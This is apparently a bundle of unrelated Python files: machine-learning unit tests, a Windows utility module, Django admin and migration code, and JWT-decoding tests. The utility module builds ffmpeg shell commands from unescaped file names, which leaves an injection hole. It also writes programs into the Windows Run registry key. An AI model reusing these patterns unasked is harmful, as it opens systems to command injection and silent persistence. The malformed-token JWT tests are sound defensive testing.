pred_2 = gpr_model2.predict(self.x_train)
file = ('/tmp/test_torch_serialization.pkl')
torch.save(gpr_model.state_dict(), file)
gpr_model2.load_state_dict(torch.load(file))
pred_3 = gpr_model2.predict(self.x_train)
assert not np.array_equal(pred_1, pred_2)
assert np.array_equal(pred_1, pred_3)
def test_mean_learning(self):
for mean_module in ['NN']:
gpr_model_vanilla = GPRegressionLearned(self.x_train, self.y_train_sin, learning_mode='vanilla', num_iter_fit=20,
mean_module='constant', covar_module='SE')
gpr_model_vanilla.fit()
gpr_model_learn_mean = GPRegressionLearned(self.x_train, self.y_train_sin, learning_mode='learn_mean', num_iter_fit=100,
mean_module=mean_module, covar_module='SE', mean_nn_layers=(16, 16))
gpr_model_learn_mean.fit()
ll_vanilla, rmse_vanilla, _ = gpr_model_vanilla.eval(self.x_train, self.y_train_two)
ll_mean, rmse_mean, _ = gpr_model_learn_mean.eval(self.x_train, self.y_train_sin)
print(ll_mean, ll_vanilla)
print(rmse_mean, rmse_vanilla)
self.assertGreater(ll_mean, ll_vanilla)
self.assertLess(rmse_mean, rmse_vanilla)
def test_kernel_learning_COS(self):
for learning_mode in ['learn_kernel', 'both']:
gpr_model_vanilla = GPRegressionLearned(self.x_train, self.y_train_sin, learning_mode='vanilla',
num_iter_fit=1,
mean_module='constant', covar_module=CosineKernel())
gpr_model_vanilla.fit()
gpr_model_learn_kernel = GPRegressionLearned(self.x_train, self.y_train_sin, learning_mode='learn_kernel',
num_iter_fit=500,
mean_module='constant', covar_module=CosineKernel())
print(gpr_model_learn_kernel.model.covar_module.lengthscale)
gpr_model_learn_kernel.fit(valid_x=self.x_train, valid_t=self.y_train_sin)
print(gpr_model_learn_kernel.model.covar_module.lengthscale)
ll_vanilla, rmse_vanilla, _ = gpr_model_vanilla.eval(self.x_train, self.y_train_sin)
ll_kernel, rmse_kernel, _ = gpr_model_learn_kernel.eval(self.x_train, self.y_train_sin)
print('learning_mode', learning_mode)
print(ll_kernel, ll_vanilla)
print(rmse_kernel, rmse_vanilla)
self.assertGreater(ll_kernel, ll_vanilla)
self.assertLess(rmse_kernel, rmse_vanilla)
def test_kernel_learning_NN(self):
for learning_mode in ['learn_kernel', 'both']:
gpr_model_vanilla = GPRegressionLearned(self.x_train, self.y_train_sin, learning_mode='learn_kernel',
num_iter_fit=1,
mean_module='zero', covar_module='NN')
gpr_model_vanilla.fit()
gpr_model_learn_kernel = GPRegressionLearned(self.x_train, self.y_train_sin, learning_mode=learning_mode,
num_iter_fit=500, mean_module='constant', covar_module='NN',
kernel_nn_layers=(16, 16), mean_nn_layers=(16, 16))
gpr_model_learn_kernel.fit(valid_x=self.x_train, valid_t=self.y_train_sin)
ll_vanilla, rmse_vanilla, _ = gpr_model_vanilla.eval(self.x_train, self.y_train_sin)
ll_kernel, rmse_kernel, _ = gpr_model_learn_kernel.eval(self.x_train, self.y_train_sin)
print('learning_mode', learning_mode)
print(ll_kernel, ll_vanilla)
print(rmse_kernel, rmse_vanilla)
self.assertGreater(ll_kernel, ll_vanilla)
self.assertLess(rmse_kernel, rmse_vanilla)
class TestGPR_mll_meta(unittest.TestCase):
def setUp(self):
## --- generate toy data --- #
torch.manual_seed(22)
np.random.seed(23)
#sample_data = lambda n_samples: sample_sinusoid_regression_data(n_samples_train, amp_low=0.9, amp_high=1.1, slope_std=0.01)
# meta train
n_train_datasets = 10
n_samples_train = 5
self.train_data_tuples = [sample_data_nonstationary(n_samples_train) for _ in range(n_train_datasets)]
# test
n_test_datasets = 10
n_samples_test_context = 5
n_samples_test = 50
test_data = [sample_data_nonstationary(n_samples_test_context + n_samples_test) for _ in
range(n_test_datasets)]
# split data into test_context and test_valid
self.test_data_tuples = [(x[:n_samples_test_context], t[:n_samples_test_context],
x[n_samples_test_context:], t[n_samples_test_context:]) for (x, t) in test_data]
def test_random_seed_consistency(self):
gp_meta_1 = GPRegressionMetaLearned(self.train_data_tuples[:2], learning_mode='both', num_iter_fit=5,
covar_module='NN', mean_module='NN', random_seed=22)
gp_meta_2 = GPRegressionMetaLearned(self.train_data_tuples[:2], learning_mode='both', num_iter_fit=5,
covar_module='NN', mean_module='NN', random_seed=22)
gp_meta_1.meta_fit(valid_tuples=self.test_data_tuples)
gp_meta_2.meta_fit(valid_tuples=self.test_data_tuples)
for (x_context, t_context, x_test, _) in self.test_data_tuples[:3]:
t_predict_1 = gp_meta_1.predict(x_context, t_context, x_test)
t_predict_2 = gp_meta_2.predict(x_context, t_context, x_test)
self.assertTrue(np.array_equal(t_predict_1, t_predict_2))
def test_serializable(self):
torch.manual_seed(40)
np.random.seed(22)
import itertools
# check that more datasets improve performance
for mean_module, covar_module in itertools.product(['constant', 'NN'], ['SE', 'NN']):
gpr_model = GPRegressionMetaLearned(self.train_data_tuples[:3], learning_mode='both',
num_iter_fit=5, mean_module=mean_module, covar_module='NN', random_seed=22)
gpr_model.meta_fit()
pred_1 = gpr_model.predict(*self.test_data_tuples[0][:3])
gpr_model2 = GPRegressionMetaLearned(self.train_data_tuples[:3], learning_mode='both',
num_iter_fit=5, mean_module=mean_module, covar_module='NN', random_seed=25)
gpr_model2.meta_fit()
pred_2 = gpr_model2.predict(*self.test_data_tuples[0][:3])
file = ('/tmp/test_torch_serialization.pkl')
torch.save(gpr_model.state_dict(), file)
gpr_model2.load_state_dict(torch.load(file))
pred_3 = gpr_model2.predict(*self.test_data_tuples[0][:3])
assert not np.array_equal(pred_1, pred_2)
assert np.array_equal(pred_1, pred_3)
torch.manual_seed(25)
gpr_model.rds_numpy = np.random.RandomState(55)
gpr_model.meta_fit()
torch.manual_seed(25)
gpr_model2.rds_numpy = np.random.RandomState(55)
gpr_model2.meta_fit()
pred_1 = gpr_model.predict(*self.test_data_tuples[0][:3])
pred_2 = gpr_model2.predict(*self.test_data_tuples[0][:3])
assert np.array_equal(pred_1, pred_2)
def test_mean_learning_more_datasets(self):
torch.manual_seed(40)
# check that more datasets improve performance
# meta-learning with 2 datasets
gp_meta = GPRegressionMetaLearned(self.train_data_tuples[:2], learning_mode='both', mean_nn_layers=(16, 16),
kernel_nn_layers=(16, 16), num_iter_fit=3000, covar_module='SE',
mean_module='NN', weight_decay=0.0)
gp_meta.meta_fit(valid_tuples=self.test_data_tuples)
test_ll_meta_2, test_rmse_meta_2, _ = gp_meta.eval_datasets(self.test_data_tuples)
print('Test log-likelihood meta (2 datasets):', test_ll_meta_2)
# meta-learning with 10 datasets
gp_meta = GPRegressionMetaLearned(self.train_data_tuples, learning_mode='both', mean_nn_layers=(16, 16),
kernel_nn_layers=(16, 16), num_iter_fit=3000, covar_module='SE',
mean_module='NN', weight_decay=0.0)
gp_meta.meta_fit(valid_tuples=self.test_data_tuples)
test_ll_meta_10, test_rmse_meta_10, _ = gp_meta.eval_datasets(self.test_data_tuples)
print('Test log-likelihood meta (10 datasets):', test_ll_meta_10)
self.assertGreater(test_ll_meta_10, test_ll_meta_2)
self.assertLess(test_rmse_meta_10, test_rmse_meta_2)
def test_normal_vs_meta(self):
# check that meta-learning improves upon normal learned GP
torch.manual_seed(60)
num_iter_fit = 1000
# meta-learning
gp_meta = GPRegressionMetaLearned(self.train_data_tuples, learning_mode='both', mean_nn_layers=(64, 64),
covar_module='SE', mean_module='NN', weight_decay=0.0, num_iter_fit=num_iter_fit)
gp_meta.meta_fit(valid_tuples=self.test_data_tuples)
test_ll_meta, test_rmse_meta, _ = gp_meta.eval_datasets(self.test_data_tuples)
print('Test log-likelihood meta:', test_ll_meta)
def fit_eval_gpr(x_context, t_context, x_test, t_test):
gpr = GPRegressionLearned(x_context, t_context, learning_mode='both', mean_nn_layers=(64, 64),
covar_module='SE', mean_module='NN', weight_decay=0.0, num_iter_fit=num_iter_fit)
gpr.fit(valid_x=x_test, valid_t=t_test)
return gpr.eval(x_test, t_test)[0]
ll_list = [fit_eval_gpr(*data_tuple) for data_tuple in self.test_data_tuples]
test_ll_normal = np.mean(ll_list)
print('Test log-likelihood normal:', test_ll_normal)
self.assertGreater(test_ll_meta, test_ll_normal)
""" --- helper functions for data generation ---"""
def sample_data_nonstationary(size=1):
def _sample_fun():
slope = np.random.normal(loc=1, scale=0.2)
freq = lambda x: 1 + np.abs(x)
mean = lambda x: slope * x
return lambda x: (mean(x) + np.sin(freq(x) * x)) / 5
func = _sample_fun()
X = np.random.uniform(-5, 5, size=(size, 1))
Y = func(X)
return X, Y
if __name__ == '__main__':
unittest.main() |
# -- coding:utf-8 --
import socket,traceback,os,os.path,sys,time,struct,base64,gzip,array,json,zlib,threading
import datetime,uuid
def getmtime(file):
try:
return os.path.getmtime(file)
except: return 0
def getfiledigest(file,bufsize=1024*5,type='md5'):
import hashlib
m = hashlib.md5()
try:
fp = open(file,'rb')
while True:
data = fp.read(bufsize)
if not data:break
m.update(data)
fp.close()
return m.hexdigest()
except:
traceback.print_exc()
return ''
def getdigest(d,bufsize=1024*5,type='md5'):
import hashlib
try:
m = hashlib.md5()
m.update(d)
return m.hexdigest()
except:
return ''
def setmtime(file,tick): # tick - unix timestamp 1970~
os.utime(file,(tick,tick) )
def getdbsequence_pg(dbconn,seqname):
seq = 0
try:
sql = "select nextval('%s')"%seqname
cr = dbconn.cursor()
cr.execute(sql)
seq = cr.fetchone()[0]
except:
traceback.print_exc()
return seq
def loadjson(file):
d = None
try:
fd = open(file)
cont = fd.read().strip()
cont = cont.replace(' ','')
cont = cont.replace('\'',"\"")
cont = cont.replace('\t',"")
cont = cont.replace('(',"[")
cont = cont.replace(')',"]")
# print cont
fd.close()
d = json.loads(cont)
except:
traceback.print_exc()
pass #traceback.print_exc()
return d
def waitForShutdown():
time.sleep(1*10000*10)
def genTempFileName():
return str(time.time())
# unix timestamp to datetime.datetime
def mk_datetime(timestamp):
timestamp = int(timestamp)
return datetime.datetime.fromtimestamp(timestamp)
def formatTimestamp(secs):
try:
dt = datetime.datetime.fromtimestamp(secs)
return "%04d-%02d-%02d %02d:%02d:%02d"%(dt.year,dt.month,dt.day,dt.hour,dt.minute,dt.second)
except:
return ''
def formatTimestamp2(secs):
try:
dt = datetime.datetime.fromtimestamp(secs)
return "%04d.%02d.%02d %02d:%02d:%02d"%(dt.year,dt.month,dt.day,dt.hour,dt.minute,dt.second)
except:
traceback.print_exc()
return ''
def formatTimestamp_ymdhm(secs):
try:
dt = datetime.datetime.fromtimestamp(secs)
return "%04d-%02d-%02d %02d:%02d"%(dt.year,dt.month,dt.day,dt.hour,dt.minute)
except:
return ''
def formatDate_ymd(dt):
try:
return "%04d-%02d-%02d"%(dt.year,dt.month,dt.day)
except:
return ''
def formatTimeLength(secs):
h = int(secs/3600)
secs = secs%3600
m = int(secs/60)
s = secs%60
return '%02d:%02d:%02d'%(h,m,s)
#根据datetime产生timestamp
def maketimestamp(dt):
if not dt:
return 0
return int(time.mktime(dt.timetuple()))
def maketimestamp64(dt):
return maketimestamp(dt)*1000
def currentTimestamp64():
return maketimestamp64( datetime.datetime.now())
def touchfile(file):
try:
fp = open(file,'w')
fp.close()
except:
return False
return True
def currentDateTimeStr():
return formatTimestamp( maketimestamp(datetime.datetime.now()))
def getToDayStr():
t = time.localtime()
return "%04d%02d%02d"%(t.tm_year,t.tm_mon,t.tm_mday)
def getToDayStr2():
t = time.localtime()
return "%04d-%02d-%02d"%(t.tm_year,t.tm_mon,t.tm_mday)
#这个class用于异步等待获取返回对象之用
class MutexObject:
def __init__(self):
self.mtx = threading.Condition()
self.d = None
def waitObject(self,timeout):
d = None
self.mtx.acquire()
if self.d == None:
self.mtx.wait(timeout)
d = self.d
self.d = None
self.mtx.release()
return d
def notify(self,d):
self.mtx.acquire()
self.d = d
self.mtx.notify()
self.mtx.release()
def geo_rect2wktpolygon(rc):
# rc - (x,y,w,h)
x,y,w,h = rc
return "POLYGON((%s %s,%s %s,%s %s,%s %s,%s %s))"%\
(x,y,x+w,y,x+w,y+h,x,y+h,x,y)
def readImageTimes(imagefile,ffmpeg='ffmpeg.exe'):
import re
rst = () # (creattime,lastmodifytime) timestamp time ticks
detail = os.popen3('%s -i %s'%(ffmpeg,imagefile) )[2].read()
tt = re.findall('Duration: (\d{1,2}:\d{1,2}:\d{1,2}\.\d{0,4}),',detail,re.M)
if tt:
tt = tt[0]
else:
return (0,0)
h,m,s = map(int, map(float,tt.split(':')) )
duration_secs = int ( h*3600 + m * 60 + s)
lastmodify = os.path.getmtime(imagefile)
createsecs = lastmodify - duration_secs
return (int(createsecs),int(lastmodify))
def statevfs(path):
import win32api
import os.path
path = os.path.normpath(path)
if path[-1]=='\\':
path = path[:-1]
try:
f,all,user = win32api.GetDiskFreeSpaceEx(path)
return all,user
except:return 0,0
def hashobject(obj):
attrs = [s for s in dir(obj) if not s.startswith('__')]
kvs={}
for k in attrs:
kvs[k] = getattr(obj, k)
#kvs = {k:getattr(obj, k) for k in attrs}
return kvs
def hashobject2(obj):
attrs = [s for s in dir(obj) if not s.startswith('__') ]
kvs={}
for k in attrs:
attr = getattr(obj, k)
if not callable(attr):
kvs[k] = attr
#kvs = {k:getattr(obj, k) for k in attrs}
return kvs
MB_SIZE = 1024.*1024.
def formatfilesize(size):
mb = round(size/MB_SIZE,3)
return mb
def readImageTimes(imagefile,ffmpeg='ffmpeg.exe'):
import re
rst = () # (creattime,lastmodifytime) timestamp time ticks
imagefile = os.path.normpath(imagefile)
detail = os.popen3('ffmpeg.exe -i %s'%(imagefile) )[2].read()
tt = re.findall('Duration: (\d{1,2}:\d{1,2}:\d{1,2}\.\d{0,4}),',detail,re.M)
if tt:
tt = tt[0]
else:
return ()
h,m,s = map(int, map(float,tt.split(':')) )
duration_secs = int ( h*3600 + m * 60 + s)
lastmodify = os.path.getmtime(imagefile)
createsecs = lastmodify - duration_secs
return (int(createsecs),int(lastmodify))
def readImageDuration(imagefile,ffmpeg='ffmpeg.exe'):
import re
rst = () # (creattime,lastmodifytime) timestamp time ticks
imagefile = os.path.normpath(imagefile)
cmd = u'ffmpeg.exe -i %s'%(imagefile)
detail = os.popen3(cmd.encode('gbk') )[2].read()
tt = re.findall('Duration: (\d{1,2}:\d{1,2}:\d{1,2}\.\d{0,4}),',detail,re.M)
if tt:
tt = tt[0]
else:
return 0
h,m,s = map(int, map(float,tt.split(':')) )
duration_secs = int ( h*3600 + m * 60 + s)
return duration_secs
def parseInetAddress(address):
try:
host,port=address.split(':')
port = int(port)
return host,port
except:
return ()
class SimpleConfig:
def __init__(self):
self.confile =''
self.props={}
def load(self,file):
try:
f = open(file,'r')
lines = f.readlines()
f.close()
self.props={}
for line in lines:
line = line.strip()
if not line or line[0]=='#':
continue
line = line.split('#')[0]
pp = line.split('=')
if len(pp)!=2:
continue
k,v = pp[0].strip(),pp[1].strip()
self.props[k] = v
except:
traceback.print_exc()
self.props ={}
return self
def get(self,key,default=None):
return self.props.get(key,default)
def multi_get_letter(str_input):
if isinstance(str_input, unicode):
unicode_str = str_input
else:
try:
unicode_str = str_input.decode('utf8')
except:
try:
unicode_str = str_input.decode('gbk')
except:
print 'unknown coding'
return
return_list = []
for one_unicode in unicode_str:
#print single_get_first(one_unicode)
return_list.append(single_get_first(one_unicode))
return "".join(return_list)
def single_get_first(unicode1):
str1 = unicode1.encode('gbk')
try:
ord(str1)
return str1
except:
asc = ord(str1[0]) * 256 + ord(str1[1]) - 65536
if asc >= -20319 and asc <= -20284:
return 'a'
if asc >= -20283 and asc <= -19776:
return 'b'
if asc >= -19775 and asc <= -19219:
return 'c'
if asc >= -19218 and asc <= -18711:
return 'd'
if asc >= -18710 and asc <= -18527:
return 'e'
if asc >= -18526 and asc <= -18240:
return 'f'
if asc >= -18239 and asc <= -17923:
return 'g'
if asc >= -17922 and asc <= -17418:
return 'h'
if asc >= -17417 and asc <= -16475:
return 'j'
if asc >= -16474 and asc <= -16213:
return 'k'
if asc >= -16212 and asc <= -15641:
return 'l'
if asc >= -15640 and asc <= -15166:
return 'm'
if asc >= -15165 and asc <= -14923:
return 'n'
if asc >= -14922 and asc <= -14915:
return 'o'
if asc >= -14914 and asc <= -14631:
return 'p'
if asc >= -14630 and asc <= -14150:
return 'q'
if asc >= -14149 and asc <= -14091:
return 'r'
if asc >= -14090 and asc <= -13119:
return 's'
if asc >= -13118 and asc <= -12839:
return 't'
if asc >= -12838 and asc <= -12557:
return 'w'
if asc >= -12556 and asc <= -11848:
return 'x'
if asc >= -11847 and asc <= -11056:
return 'y'
if asc >= -11055 and asc <= -10247:
return 'z'
return ''
class Logger:
def __init__(self):
self.handlers=[]
self.dumpEnabled = False #默认不启动日志输出
if os.path.exists('logdump.yes'):
self.dumpEnabled = True
__handle = None
@staticmethod
def instance():
if not Logger.__handle:
Logger.__handle = Logger()
return Logger.__handle
def addHandler(self,h):
self.handlers.append(h)
def info(self,s):
self.write(s,'INFO')
def error(self,s):
self.write(s,'ERROR')
def debug(self,s):
self.write(s)
def write(self,s,level='DEBUG'):
if not self.dumpEnabled:
return
import time
if not s.strip():
return
stime = formatTimestamp(int(time.time()))
s = stime + ' %s '%level + s
for h in self.handlers:
try:
h.write(s)
except:
traceback.print_exc()
def writelines(self,text,level='DEBUG'):
#text = text.strip()
self.write(text+'\n',level)
class StdoutHandler:
def __init__(self,stdout=None):
self.stdout = stdout
def write(self,s):
if self.stdout:
try:
self.stdout.write(s+'\n')
except:
self.stdout.write(s.encode('gbk')+'\n')
class FileHandler:
def __init__(self,file,mode='a+'):
self.file = file
self.mode = mode
self.hfile = None
def write(self,s):
if not self.hfile:
self.hfile = open(self.file,self.mode)
if self.hfile:
try:
self.hfile.write(s+'\n')
except:
self.hfile.write(s.encode('gbk')+'\n')
self.hfile.flush()
class DatagramHandler:
def __init__(self,dest=('127.0.0.1',17948)):
self.dest = dest
self.sock = None
def write(self,s):
import socket
if not self.sock:
self.sock = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
try:
self.sock.sendto(s,0,self.dest)
except:
self.sock.sendto(s.encode('gbk'),0,self.dest)
def setAutoRunWithOsStart(key,app,start=True):
import _winreg
try:
r = _winreg.OpenKey(
_winreg.HKEY_LOCAL_MACHINE,
r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run",0,_winreg.KEY_WRITE)
if start:
_winreg.SetValueEx(r,key,0,_winreg.REG_SZ,app)
else:
_winreg.DeleteValue(r,key)
except:
traceback.print_exc()
def getRegisterValueInAutoRun(key='audioTerm'):
import _winreg
try:
r = _winreg.OpenKey(
_winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
p1,num,p3 = _winreg.QueryInfoKey(r)
for n in range(num):
p1,p2,p3 = _winreg.EnumValue(r,n)
if p1 == key:
return p2
except:
traceback.print_exc()
return None
def killProcess(pid):
import subprocess
# handle = subprocess.Popen("", shell=False)
subprocess.Popen("taskkill /F /T /PID %i"%pid , shell=True)
class Win32:
@staticmethod
def dispatchMessage(winid):
import win32api,win32gui,win32con
status, msg = win32gui.PeekMessage(winid,0,0,win32con.PM_NOREMOVE)
if not msg[0] == 0:
b,msg = win32gui.GetMessage(winid,0,0)
if msg:
win32gui.TranslateMessage(msg)
win32gui.DispatchMessage(msg)
def loadValuesFromFile(filename):
values={}
try:
f = open(filename)
content = f.readlines()
f.close()
for line in content:
line = line.strip()
if not line: continue
values[line]=None
except:
values={}
return values.keys()
def saveValuesToFile(filename,values):
try:
f = open(filename,'w')
for val in values:
f.write(val+'\n')
f.close()
except:
return False
return True
def normalizeString(s):
if not s:
return ''
return s
def genUUID():
return uuid.uuid4().hex
def encodeBase64(s):
if not s:
return ''
return base64.encodestring(s).strip()
def decodeBase64(s):
if not s:
return ''
return base64.decodestring(s)
def random_password(size = 6):
import string,random
N = size
return ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(N))
if __name__=='__main__':
#print loadjson('node.txt')
#print statevfs('d:/temp4/')
#print getfiledigest('D:/test_dvr_data/stosync/file0014.trp')
#print readImageTimes(u'P:/20120523/沪EN3870/1-2/DCIM/100MEDIA/FILE0006.MOV'.encode('gbk'))
# print SimpleConfig().load('system.conf').get('inv_cancel_mode')
# u,all = statevfs('c:/temp')
# print u/1024/1024/1024,all/1024/1024/1024
#print sc.props
#setAutoRunWithOsStart('audioTerm',r'c:\abc.exe',True)
r = getRegisterValueInAutoRun('audioTerm')
print repr(r)
|
from django.contrib import admin
from .models import User, Organisation, UserOrganisation
# Register your models here.
admin.site.site_header = 'Orange Track'
class UserOrganisationAdmin(admin.ModelAdmin):
search_fields = ['organization']
list_display = ('organization', 'user', 'is_admin')
fields = ('organization', 'user', 'is_admin')
list_filter = ('user',)
class OrganisationAdmin(admin.ModelAdmin):
search_fields = ['title']
list_display = ('title', 'brand', 'email', 'phone', 'website')
fields = ('title', 'brand', 'email', 'phone', 'website')
class UserAdmin(admin.ModelAdmin):
search_fields = ['nick_name', 'email']
list_display = ('nick_name', 'email', 'phone', 'user_type')
fields = ('nick_name', 'email', 'street', 'city', 'state', 'zip_code', 'phone', 'user_type')
list_filter = ('user_type',)
admin.site.register(User, UserAdmin)
admin.site.register(Organisation, OrganisationAdmin)
admin.site.register(UserOrganisation, UserOrganisationAdmin)
|
N, M = map( int, input().split())
print(((N-M)*100 + M*1900)*(2**M))
|
from distutils.core import setup, Extension
import os
import numpy as np
def numpy_include():
try:
inc = np.get_include()
except AttributeError:
inc = np.get_numpy_include()
return inc
np_inc = numpy_include()
script_root = os.path.dirname(os.path.realpath(__file__))
src_root = f'{script_root}/geogrid/src/'
extensions = [
Extension('_python_geogrid', [src_root+'python_geogrid_wrap.c', src_root+'write_geogrid.c', src_root+'read_geogrid.c'], include_dirs=[np_inc])]
setup(name = 'python_geogrid',
version = "1.0",
ext_modules = extensions,
py_modules = ['python_geogrid'],
package_dir = {'' : 'geogrid/src'}
) |
# Generated by Django 2.0.1 on 2018-02-20 07:55
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('PlanningBoard', '0024_merge_20180218_2012'),
]
operations = [
migrations.RenameField(
model_name='planning',
old_name='recruting_number',
new_name='recruiting_number',
),
]
|
#!/usr/bin/python
import socket
import sys
UDP_IP = '127.0.0.1'
UDP_PORT = 1737
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind((UDP_IP, UDP_PORT))
while 1:
data = s.recv(1024)
#print data,
sys.stdout.write(data);
conn.close()
|
from .create_invite import CreateInviteController
from ..usecases import create_invite_usecase
create_invite_controller = CreateInviteController(create_invite_usecase)
|
from setuptools import setup
setup(
name='Flask-FirebaseAuth',
version='0.1.1',
description='Google Firebase Authentication integration for Flask',
packages=['flask_firebaseauth'],
include_package_data=True,
install_requires=[
'Flask>=0.11',
'PyJWT>=1.4',
'cryptography>=1.6',
'requests>=2.12',
])
|
# input
L = ['mango', 'grapes', 'banana', 'apple']
# process
'''
new = ['cherries', 'gauva', 'melon']
L.extend(new)
L.remove('grapes')
L.sort()
'''
L = ['mango', 'grapes', 'banana', 'apple']
L.remove('grapes')
L1 = ['cherries', 'gauva', 'melon']
L.extend(L1)
L.sort()
print(L)
# output
#print(L)
# ['apple', 'banana', 'cherries', 'gauva', 'mango', 'melon']
|
import numpy as np
class Prediction:
def __init__(self):
self.n = 3
self.N = self.n * self.n
self.bk = 9
q_tab = np.load('./q_tab_9.npz')
k = q_tab['k']
v = q_tab['v']
self.q_tab = dict(zip(k, v)) # 构建Q表
self.X = [-1, 0, 1, 0]
self.Y = [0, -1, 0, 1]
def pre_step(self, x): # 预测状态 x 对应的步数
x = x.reshape(1, -1)
k = ""
for i in range(self.N):
k += str(x[0, i])
v = self.q_tab.get(k, -1)
return v
def pre_next(self, sta, bk_x, bk_y): # 预测下一步往哪个方向走
step = [10000, 10000, 10000, 10000]
direction = np.random.permutation(4) # 生成0~3的随机排列
for i in direction:
x = bk_x + self.X[i]
y = bk_y + self.Y[i]
if x < 0 or x >= self.n or y < 0 or y >= self.n:
continue
t = sta[x][y]
sta[x][y] = self.bk
sta[bk_x][bk_y] = t
step[i] = self.pre_step(sta)
sta[x][y] = t
sta[bk_x][bk_y] = self.bk
return np.argmin(step) |
import base64
import os
import json
import pytest
from sdc.crypto.exceptions import InvalidTokenException
from sdc.crypto.jwt_helper import JWTHelper
from sdc.crypto.key_store import KeyStore
from tests import TEST_DO_NOT_USE_UPSTREAM_PUBLIC_PEM, TEST_DO_NOT_USE_SR_PRIVATE_PEM, \
TEST_DO_NOT_USE_UPSTREAM_PRIVATE_KEY, TEST_DO_NOT_USE_SR_PUBLIC_KEY, TEST_DO_NOT_USE_EQ_PRIVATE_KEY, \
TEST_DO_NOT_USE_EQ_PUBLIC_KEY
KEY_PURPOSE_AUTHENTICATION = "authentication"
# jwt.io public key signed
TEST_DO_NOT_USE_PUBLIC_KEY = """-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDdlatRjRjogo3Wojg
GHFHYLugdUWAY9iR3fy4arWNA1KoS8kVw33cJibXr8bvwUAUparCwlv
dbH6dvEOfou0/gCFQsHUfQrSDv+MuSUMAe8jzKE4qW+jK+xQU9a03GU
nKHkkle+Q0pX/g6jXZ7r1/xAK5Do2kQ+X5xK9cipRgEKwIDAQAB
-----END PUBLIC KEY-----"""
jwtio_header = "eyJraWQiOiI3MDllYjQyY2ZlZTU1NzAwNThjZTA3MTFmNzMwYmZiYjdkNGM4YWRlIiwiYWxnIjoiUlMyNTYiLCJ0eXAiOiJqd3" \
"QifQ"
jwtio_payload = "eyJ1c2VyIjoiamltbXkiLCJpYXQiOjE0OTgxMzc1MTkuMTM1NDc5LCJleHAiOjEuMDAwMDAwMDAwMDAxNDk4MmUrMjF9"
jwtio_signature = "tXGcIZf" \
"bTIgxrd7ILj_XqcoiRLtmgjnJ0WORPBJ4M9Kd3zKTBkoIM6pN5XWdqsfvdby53mxQzi3_" \
"DZS4Ab4XvF29Wce49GVv7k69ZZJ-5g2NX9iJy4_Be8uTZNKSwMpfrnkRrsbaWAGrXe9NKC3WC_Iq4UuE3KM7ltvOae4be-2" \
"863DP7_QEUtaAtXSwUkjPcgkvMPns-SurtFNXgFFVToNnwIuJ9UWsY8JlX1UB56wfqu68hbl88" \
"lenIf9Ym0r5hq0DlOZYNtjVizVDFciRx_52d4oeKMSzwJ1jB5aZ7YKRNHTo38Kltb5FkHRcIkV1Ae68-5dZeE9Yu_JHPMi_hw"
jwtio_signed = jwtio_header + "." + jwtio_payload + "." + jwtio_signature
class TestTokenHelper:
CHECK_CLAIMS = {
"exp": None,
"iat": None,
}
key_store = KeyStore({
"keys": {
"e19091072f920cbf3ca9f436ceba309e7d814a62": {'purpose': KEY_PURPOSE_AUTHENTICATION,
'type': 'private',
'value': TEST_DO_NOT_USE_SR_PRIVATE_PEM,
'service': 'some-service'},
"EQ_USER_AUTHENTICATION_SR_PRIVATE_KEY": {'purpose': KEY_PURPOSE_AUTHENTICATION,
'type': 'private',
'value': TEST_DO_NOT_USE_SR_PRIVATE_PEM,
'service': 'some-service'},
"EDCRRM": {'purpose': KEY_PURPOSE_AUTHENTICATION,
'type': 'public',
'value': TEST_DO_NOT_USE_PUBLIC_KEY,
'service': 'some-service'},
"709eb42cfee5570058ce0711f730bfbb7d4c8ade": {'purpose': KEY_PURPOSE_AUTHENTICATION,
'type': 'public',
'value': TEST_DO_NOT_USE_UPSTREAM_PUBLIC_PEM,
'service': 'some-service'},
"EQ_USER_AUTHENTICATION_EQ_KEY": {'purpose': KEY_PURPOSE_AUTHENTICATION,
'type': 'private',
'value': TEST_DO_NOT_USE_EQ_PRIVATE_KEY,
'service': 'some-service'},
}
})
key_store_secondary = KeyStore({
"keys": {
"EQ_USER_AUTHENTICATION_EQ_KEY": {'purpose': KEY_PURPOSE_AUTHENTICATION,
'type': 'public',
'value': TEST_DO_NOT_USE_EQ_PUBLIC_KEY,
'service': 'some-service'},
}
})
kid = "e19091072f920cbf3ca9f436ceba309e7d814a62"
encoder_args = (
TEST_DO_NOT_USE_UPSTREAM_PRIVATE_KEY,
TEST_DO_NOT_USE_SR_PUBLIC_KEY
)
def test_jwt_io(self):
token = JWTHelper.decode(jwtio_signed, self.key_store, purpose=KEY_PURPOSE_AUTHENTICATION,
leeway=100, check_claims=self.CHECK_CLAIMS)
assert token.get("user") == "jimmy"
def test_does_not_contain_two_instances_of_full_stop(self):
jwe = jwtio_signed.replace('.', '', 1)
self.assert_in_decode_signed_jwt_exception(jwe, "Invalid Header")
def test_jwt_contains_empty_header(self):
token_without_header = "e30." + jwtio_payload + "." + jwtio_signature
self.assert_in_decode_signed_jwt_exception(token_without_header, "Missing kid")
def test_jwt_does_not_contain_header_at_all(self):
token_without_header = "." + jwtio_payload + "." + jwtio_signature
self.assert_in_decode_signed_jwt_exception(token_without_header, "Missing Headers")
def test_jwt_contains_empty_payload(self):
token_without_payload = jwtio_header + ".e30." + jwtio_signature
self.assert_in_decode_signed_jwt_exception(token_without_payload, "InvalidJWSSignature")
def test_jwt_does_not_contain_payload(self):
token_without_payload = jwtio_header + ".." + jwtio_signature
self.assert_in_decode_signed_jwt_exception(token_without_payload, "InvalidJWSSignature")
def test_jwt_does_not_contain_signature(self):
jwt = jwtio_header + "." + jwtio_payload + ".e30"
self.assert_in_decode_signed_jwt_exception(jwt, "InvalidJWSSignature")
def test_jose_header_missing_type(self):
header = base64.urlsafe_b64encode(b'{"alg":"RS256", "kid":"EDCRRM"}')
jwt = header.decode() + "." + jwtio_payload + "." + jwtio_signature
self.assert_in_decode_signed_jwt_exception(jwt, "InvalidJWSSignature")
def test_jose_header_invalid_type(self):
header = base64.urlsafe_b64encode(b'{"alg":"RS256", "kid":"EDCRRM", "typ":"TEST"}')
jwt = header.decode() + "." + jwtio_payload + "." + jwtio_signature
